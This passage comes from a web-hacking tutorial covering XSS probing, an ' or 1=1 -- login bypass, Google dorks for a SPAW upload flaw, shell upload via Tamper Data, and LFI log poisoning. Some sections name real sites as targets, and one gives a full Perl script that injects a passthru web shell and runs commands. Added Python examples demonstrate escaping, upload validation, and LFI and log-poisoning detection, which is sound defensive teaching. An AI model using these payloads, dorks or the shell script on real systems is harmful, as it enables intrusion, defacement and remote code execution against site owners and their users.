Test 2:
Now we are going to check whether the server sanitizes our input or not. In order
to do this, let us input the <script> tag in the input field.

View the source of the page. Find the location where the input was displayed in the
previous test.

Thank god, our code is not being sanitized by the server, and the code is just the
same as what we entered in the field. If the server sanitized our input, the code would
look like this: &lt;script&gt;. This indicates that the website is vulnerable to XSS
and we can execute our own scripts.

Step 3: Exploiting the vulnerability
Now we know the site is somewhat vulnerable to XSS. But let us make
sure the site is completely vulnerable to this attack by injecting a full JavaScript
snippet. For instance, let us input <script>alert('BTS')</script>.

Now it will display a pop-up box with the string 'BTS'. Finally, we have successfully
exploited the XSS. By extending the code with a malicious script, a hacker can steal
cookies, deface the site and more.


Types of XSS based on persistence:
Based on persistence, we can categorize XSS attacks into two
types, namely persistent and non-persistent.

Persistent XSS:
The persistent or stored XSS attack occurs when the malicious code submitted
by the attacker is saved by the server in the database and then permanently runs
in the normal page.
For example:
Many websites host a support forum where registered users can ask their
questions by posting messages, which are stored in the database. Let us imagine an
attacker posts a message containing malicious JavaScript code instead. If the server
fails to sanitize the input provided, the injected script gets executed. The code
will be executed whenever a user tries to read the post. If the injected code is
cookie-stealing code, then it will steal the cookie of every user who reads the post.
Using the cookie, the attacker can take control of your account.




Non-Persistent XSS:
Non-persistent XSS, also referred to as reflected XSS, is the most common type
of XSS found nowadays. In this type of attack, the injected code is sent to the
server in the HTTP request. The server embeds the input in the HTML file and returns
the file (HTTP response) to the browser. When the browser renders the HTML file, it
also executes the embedded script. This kind of XSS vulnerability frequently occurs in
search fields.
Example:
Let us consider a project-hosting website. To find our favourite project, we just
input the related word in the search box. When the search is finished, it displays
a message like "search results for your word". If the server fails to sanitize the
input properly, the injected script gets executed.
In the case of reflected XSS attacks, the attacker sends a specially crafted link to
victims and tricks them into clicking it. When the user clicks the link, the browser
sends the injected code to the server, and the server reflects the attack back to the
user's browser. The browser then executes the code.

What can an attacker do with this vulnerability?

Stealing identity and confidential data (credit card details).
Bypassing restrictions in websites.
Session hijacking (stealing sessions)
Malware attack
Website defacement
Denial of service attacks (DoS)
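
The sanitisation Test 2 looks for is output encoding on the server. Here is an added example (not from the original tutorial) of the reflected search page just described: the same `<script>alert('BTS')</script>` probe is rendered by a template that echoes the query raw and by one that HTML-escapes it, and a small parser counts the <script> elements a browser would actually see. Both page templates are constructed.

```python
"""Reflected XSS: raw echo versus HTML-escaped output.
Added example for this page; the page template is constructed."""
import html
from html.parser import HTMLParser

# Constructed template for the "search results for your word" page described above.
PAGE = "<html><body><h1>Search results for {q}</h1></body></html>"

# The probe string used in Step 3 above.
PROBE = "<script>alert('BTS')</script>"


def render_vulnerable(query):
    """Echo the query straight into the page: whatever the user typed is markup."""
    return PAGE.format(q=query)


def render_safe(query):
    """Escape <, >, &, quotes and the apostrophe before insertion, so the browser
    shows the probe as text. quote=True matters whenever the value could also
    land inside a quoted attribute; it is harmless in element content."""
    return PAGE.format(q=html.escape(query, quote=True))


class ScriptCounter(HTMLParser):
    """Count <script> start tags, i.e. script blocks the browser would run."""

    def __init__(self):
        super().__init__()
        self.scripts = 0

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self.scripts += 1


def count_scripts(document):
    """Number of <script> elements the HTML parser finds in `document`."""
    parser = ScriptCounter()
    parser.feed(document)
    parser.close()
    return parser.scripts


if __name__ == "__main__":
    print("vulnerable page:", render_vulnerable(PROBE))
    print("  script tags:", count_scripts(render_vulnerable(PROBE)))
    print("safe page:     ", render_safe(PROBE))
    print("  script tags:", count_scripts(render_safe(PROBE)))
```

The escaped page carries `&lt;script&gt;alert(&#x27;BTS&#x27;)&lt;/script&gt;`, which is exactly the `&lt;script&gt;` form Test 2 says a sanitising server would show in View Source.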




HOW TO HACK A WEBSITE WITH BASIC HTML CODING
1. Open the site you want to hack. Provide a wrong username/password
combination in its login form (e.g. Username: me and Password: ' or 1=1 --). An
error will occur saying wrong username/password. Now be prepared; your experiment
starts from here.
2. Right-click anywhere on that error page => go to View Source.
3. There you can see the HTML code with JavaScript. There you find
something like this: <_form action="...Login...">. Before this login information, copy
the URL of the site you are on.
4. Then delete the JavaScript from above that validates your information on
the server. (Do this very carefully; your success in hacking the site depends upon
how efficiently you delete the JavaScript that validates your account information.)
5. Then take a close look for "<_input name="password"
type="password">" [without quotes] -> replace "<_type=text>" there instead of
"<_type=password>". See if the maximum length of the password is less than 11; if so,
increase it to 11 (e.g. : if then write ).
6. Just go to File => Save As and save it anywhere on your hard disk with the
extension .html (e.g. c:\chan.html).
7. Reopen your target web page by double-clicking the 'chan.html' file that you
saved on your hard disk earlier. You will see some changes in the current page as
compared to the original one. Don't worry.
8. Provide any username [e.g. hacker] and password [e.g. ' or 1=1 --]. You have
successfully cracked the above website and entered the account of the first user
saved in the server's database.
Just try this.


SPAW VULNERABILITY
Spaw is a vulnerability; you can upload your deface page & shell easily on
vulnerable websites.
Let's start.
Open www.google.com
Search for any of these dorks in Google:
inurl:" spaw2/dialogs/"
inurl:" spaw2/uploads/files/"
You will get results like this: "Index of/ spaw2/dialogs/"
or: site.com/abc/spaw2/uploads/files/abc/abc.pdf
Now replace the spaw2/uploads/abc/abc part of the URL with this URL:
******** start*************
spaw2/dialogs/dialog.php?module=spawfm&dialog=spawfm&theme=spaw2&lang=es&charset=&scid=cf73b58bb51c52235494da752d98cac9&type=files
*******end***********
For example, I got this website:
--------------------------------------------------
http://climatechange.jgsee.org/Admin/spaw2/uploads/files/%20Climate%20Change.pdf
---------------------------------------------------
I will replace
__________________________________________________________
/Admin/spaw2/uploads/files/%E0%B8%AB%E0%B8%99%E0%B8%B1%E0%B8%87%E0%B8%AA%E0%B8%B7%E0%B8%AD%20Climate%20Change.pdf with
/spaw2/uploads/files/%E0%B8%AB%E0%B8%99%E0%B8%B1%E0%B8%87%E0%B8%AA%E0%B8%B7%E0%B8%AD%20Climate%20Change.pdf
______________________________________________________________

with
_________________________________________________________________
/spaw2/dialogs/dialog.php?module=spawfm&dialog=spawfm&theme=spaw2&lang=es&charset=&scid=cf73b58bb51c52235494da752d98cac9&type=files
__________________________________________________________________

And so the final URL is this:
http://climatechange.jgsee.org/Admin/spaw2/dialogs/dialog.php?module=spawfm&dialog=spawfm&theme=spaw2&lang=es&charset&scid=cf73b58bb51c52235494da752d98cac9&type=files
Now you will get a window. Click on the link to see that window:
(http://tinyurl.com/894s6qd )
If you want to upload a deface page then select the files option, and if you want to
upload a shell then select the image option and upload your shell as shell.php;,jpg
See your uploaded deface page here:
www.site.com/profile/spaw2/uploads/


UPLOADING YOUR SHELL VIA IMAGES USING TAMPER DATA
Many times you get the login of a website but you are unable to upload your PHP
shell! I'll show you how to upload your PHP shell through Tamper Data, a Firefox
add-on. Install the Tamper Data Firefox add-on:
Download Tamper Data here: https://addons.mozilla.org/en-us/firefox/addon/tamper-data/
Now install it and restart Firefox.
Rename shell:
Note: You have to rename your .php shell to .jpg to bypass the website's security.
To upload a shell, of course you need an upload option on the login page or
anywhere!
Demo:
- As an example I'll take http://freead1.net/post-free-ad-to-USA-42
- It is a free classified ads posting website,
- so I got an upload option there!
- Find your upload option and click on Browse,
- locate your .jpg shell and select it!
Now click on Tools in the Firefox menu bar and select Tamper Data; the Tamper Data
plugin will open in a new window!
Before clicking on the Upload button, click on "Start Tamper" in the Tamper Data
window.
Note: Before clicking on "Start Tamper", close every extra tab you have open.
Now click on the Upload button!
After clicking on the Upload button, a "Tamper with request?" window will appear!
Click on the "Tamper" button.
After a click on "Tamper" you will see the "Tamper Popup".
In the Tamper Popup window, copy the "POST_DATA" text into Notepad.
After copying it to Notepad, find "yourshell.jpg" and rename it to .php.
Now copy Notepad's text back into the "POST_DATA" field and click OK.
It will upload the shell as .php and you can execute it easily!
Find your .php shell & do whatever you wanted with that website.
That's all!
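Both the Spaw upload trick (shell.php;,jpg) and the Tamper Data rename above defeat a server that trusts the file name the browser sends. As an added example (not from the original text or from either tool), here is the server-side validation that closes that gap: one extension only, safe characters, an allow list, and the file's magic bytes checked against the claimed type. The sample uploads are constructed byte strings.

```python
"""Server-side upload validation that does not trust the client's file name.
Added example for this page; the uploads below are constructed."""
import os
import re

# Allowed image types and the magic bytes each must begin with.
ALLOWED = {
    "jpg": b"\xff\xd8\xff",
    "png": b"\x89PNG\r\n\x1a\n",
    "gif": b"GIF8",
}
SAFE_STEM = re.compile(r"^[A-Za-z0-9_-]{1,64}$")


def validate_upload(filename, data):
    """Return (ok, reason, stored_name) for an uploaded file.

    Checks, in order:
      1. only the base name is considered (path components are dropped);
      2. exactly one extension, so `shell.php;.jpg` and `shell.php.jpg` fail;
      3. the stem contains only safe characters;
      4. the extension is on the allow list (so `.php` never passes, whatever
         the multipart field was edited to say);
      5. the content starts with that type's magic bytes, so a PHP file that was
         merely renamed to .jpg is caught even though its name looks fine.
    The stored name is rebuilt from the validated parts, never reused verbatim.
    """
    base = os.path.basename(filename.replace("\\", "/"))
    parts = base.split(".")
    if len(parts) != 2:
        return False, "name must have exactly one extension", None
    stem, ext = parts[0], parts[1].lower()
    if not SAFE_STEM.match(stem):
        return False, "unsafe characters in file name", None
    if ext not in ALLOWED:
        return False, f"extension .{ext} not allowed", None
    if not data.startswith(ALLOWED[ext]):
        return False, f"content is not a {ext} image", None
    return True, "ok", f"{stem}.{ext}"


# Constructed sample uploads: (client-supplied name, first bytes of the body).
SAMPLES = [
    ("photo.jpg", b"\xff\xd8\xff\xe0\x00\x10JFIF"),   # genuine JPEG header
    ("shell.php", b"<?php system($_GET['c']); ?>"),   # plain PHP upload
    ("shell.jpg", b"<?php system($_GET['c']); ?>"),   # PHP renamed to .jpg
    ("shell.php;.jpg", b"\xff\xd8\xff\xe0"),           # double-extension trick
    ("../../x.jpg", b"\xff\xd8\xff\xe0"),              # traversal in the name
]


if __name__ == "__main__":
    for name, body in SAMPLES:
        print(f"{name!r:20} -> {validate_upload(name, body)}")
```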


LOCAL FILE INCLUSION ATTACK:

Note: Only for educational purposes!
Local File Inclusion (LFI) is when you have the ability to browse through the server by
means of directory traversal. One of the most common uses of LFI is to read
the /etc/passwd file. This file contains the user information of a Linux system.
Hackers find sites vulnerable to LFI the same way I discussed for RFIs.
Let's say a hacker found a vulnerable site,
www.target-site.com/index.php?p=about
By means of directory traversal he would try to browse to the /etc/passwd file:
www.target-site.com/index.php?p=../../../../../../../etc/passwd
Each ../ takes you up one directory, and the number to use depends on where on the
server you are located compared to the location of the /etc/passwd file. If the hacker
is able to successfully get to the /etc/passwd file he would see a list similar to the
one below.
root:x:0:0::/root:/bin/bash
bin:x:1:1:bin:/bin:/bin/false
daemon:x:2:2:daemon:/sbin:/bin/false
adm:x:3:4:adm:/var/log:/bin/false
lp:x:4:7:lp:/var/spool/lpd:/bin/false
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
Each line is divided into seven parts:
username:passwd:UserID:GroupID:full_name:directory:shell
If the password hash were shown, the hacker would be able to crack it and get access
to the machine, but in our case the password isn't shown. This means that the
password is shadowed and kept in the /etc/shadow file, which the hacker doesn't have
access to. If this is the case, the hacker would probably attempt to get access to
the system another way: through log injection.
The log directories are located in different places in different Linux distributions.
Below is a list of the most common locations.
../apache/logs/error.log
../apache/logs/access.log
../../apache/logs/error.log
../../apache/logs/access.log
../../../apache/logs/error.log
../../../apache/logs/access.log
../../../../../../../etc/httpd/logs/acces_log
../../../../../../../etc/httpd/logs/acces.log
../../../../../../../etc/httpd/logs/error_log
../../../../../../../etc/httpd/logs/error.log
../../../../../../../var/www/logs/access_log
../../../../../../../var/www/logs/access.log
../../../../../../../usr/local/apache/logs/access_log
../../../../../../../usr/local/apache/logs/access.log
../../../../../../../var/log/apache/access_log
../../../../../../../var/log/apache2/access_log
../../../../../../../var/log/apache/access.log
../../../../../../../var/log/apache2/access.log
../../../../../../../var/log/access_log
../../../../../../../var/log/access.log
../../../../../../../var/www/logs/error_log
../../../../../../../var/www/logs/error.log
../../../../../../../usr/local/apache/logs/error_log
../../../../../../../usr/local/apache/logs/error.log
../../../../../../../var/log/apache/error_log
../../../../../../../var/log/apache2/error_log
../../../../../../../var/log/apache2/error.log
../../../../../../../var/log/error_log
../../../../../../../var/log/error.log
Below are the steps a hacker would take to gain access to the system through
log injection.
1. First the hacker would find out what operating system version the target server is
running and then look up where the log files are located on that OS.
2. Next, through LFI, the hacker would navigate to that file location. If he is shown
a bunch of logs, then he may continue.
3. The hacker would then inject some PHP code into the logs by typing
<? passthru($_GET[cmd]) ?> after the = in the URL. This will cause the PHP script to be
logged, because there is no file by that name. What this script does is give the hacker
shell access and allow him to execute system commands.
4. Now if the hacker goes back to the log file, he will see that his PHP script wasn't
parsed and was instead converted to
%3C?%20passthru($_GET[cmd])%20?%3E
5. When you submitted the script, the browser automatically URL-encoded it. Luckily
there is a Perl script that can get around this problem. Below is the Perl script; edit
the variables $site, $path, $code and $log to the appropriate information.
#!/usr/bin/perl -w
use IO::Socket;
use LWP::UserAgent;
$site = "www.vulnerablesite.com";
$path = "/";
$code = "<? Passthru(\$_GET[cmd]) ?>";
$log  = "../../../../../../../etc/httpd/logs/error_log";
print "Trying to inject the code";
$socket = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$site",
    PeerPort => "80") or die "\nConnection Failed.\n\n";
print $socket "GET " . $path . $code . " HTTP/1.1\r\n";
print $socket "User-Agent: " . $code . "\r\n";
print $socket "Host: " . $site . "\r\n";
print $socket "Connection: close\r\n\r\n";
close($socket);
print "\nCode $code successfully injected in $log \n";
print "\nType command to run or exit to end: ";
$cmd = <STDIN>;
while ($cmd !~ "exit") {
    $socket = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$site",
        PeerPort => "80") or die "\nConnection Failed.\n\n";
    print $socket "GET " . $path . "index.php?filename=" . $log . "&cmd=$cmd HTTP/1.1\r\n";
    print $socket "Host: " . $site . "\r\n";
    print $socket "Accept: */*\r\n";
    print $socket "Connection: close\r\n\n";
    while ($show = <$socket>) {
        print $show;
    }
    print "Type command to run or exit to end: ";
    $cmd = <STDIN>;
}
6. Once the hacker runs this script and it succeeds, he will be able to run any
command on the server. From here he can run local exploits to gain root, or just
browse the server's files.
Note: Only for educational purposes.
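As a defender's counterpart to the walkthrough above, here is an added example (not from the original text): a resolver that keeps an `index.php?p=` style include inside its template directory, and a check that flags traversal sequences and PHP tags in access-log lines of the kind step 3 leaves behind. The template directory and the log lines are constructed.

```python
"""LFI prevention and log-poisoning detection.
Added example for this page; template files and log lines are constructed."""
import os
import re
import tempfile
from urllib.parse import unquote


def make_template_dir():
    """Create a throwaway template directory holding about.php (constructed)."""
    d = tempfile.mkdtemp(prefix="lfi_demo_")
    with open(os.path.join(d, "about.php"), "w") as fh:
        fh.write("<?php echo 'about'; ?>\n")
    return d


def resolve_include(base_dir, page):
    """Map a `p=` parameter to a file under base_dir, or return None.

    The parameter is URL-decoded, rejected if it is absolute or contains a
    NUL byte, joined to base_dir with a fixed `.php` suffix, and the resolved
    real path must still lie under base_dir. `../../../../etc/passwd` therefore
    cannot escape, and a symlink pointing outside is caught by realpath too.
    """
    decoded = unquote(page)
    if "\x00" in decoded or os.path.isabs(decoded):
        return None
    base = os.path.realpath(base_dir)
    candidate = os.path.realpath(os.path.join(base, decoded + ".php"))
    if os.path.commonpath([base, candidate]) != base:
        return None
    return candidate if os.path.isfile(candidate) else None


TRAVERSAL = re.compile(r"\.\./|\.\.\\")


def flag_log_lines(lines):
    """Return (line_number, reason) pairs for access-log lines that show a
    traversal sequence or a PHP tag. Lines are URL-decoded twice so that both
    the raw `../` and encoded forms such as `%2e%2e%2f` or `%3C?` are seen."""
    hits = []
    for number, line in enumerate(lines, 1):
        decoded = unquote(unquote(line))
        if TRAVERSAL.search(decoded):
            hits.append((number, "directory traversal"))
        if "<?" in decoded:
            hits.append((number, "php tag in request"))
    return hits


# Constructed access-log lines in common log format: one normal page view, the
# /etc/passwd traversal from above, the PHP tag probe from step 3 (it lands in
# the log as path and as User-Agent), and a read of the poisoned log with &cmd=.
SAMPLE_LOG = [
    '10.0.0.5 - - [01/Jan/2014:10:00:01 +0000] "GET /index.php?p=about HTTP/1.1" 200 1532 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [01/Jan/2014:10:00:07 +0000] "GET /index.php?p=../../../../../../../etc/passwd HTTP/1.1" 200 912 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [01/Jan/2014:10:00:12 +0000] "GET /%3C?%20passthru($_GET[cmd])%20?%3E HTTP/1.1" 404 209 "-" "<? passthru($_GET[cmd]) ?>"',
    '10.0.0.9 - - [01/Jan/2014:10:00:20 +0000] "GET /index.php?p=../../../../../../../var/log/apache2/access.log&cmd=id HTTP/1.1" 200 40210 "-" "Mozilla/5.0"',
]


if __name__ == "__main__":
    templates = make_template_dir()
    for p in ("about", "../../../../../../../etc/passwd", "%2e%2e/%2e%2e/etc/passwd"):
        print(f"p={p!r:40} -> {resolve_include(templates, p)}")
    for hit in flag_log_lines(SAMPLE_LOG):
        print("log line %d: %s" % hit)
```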
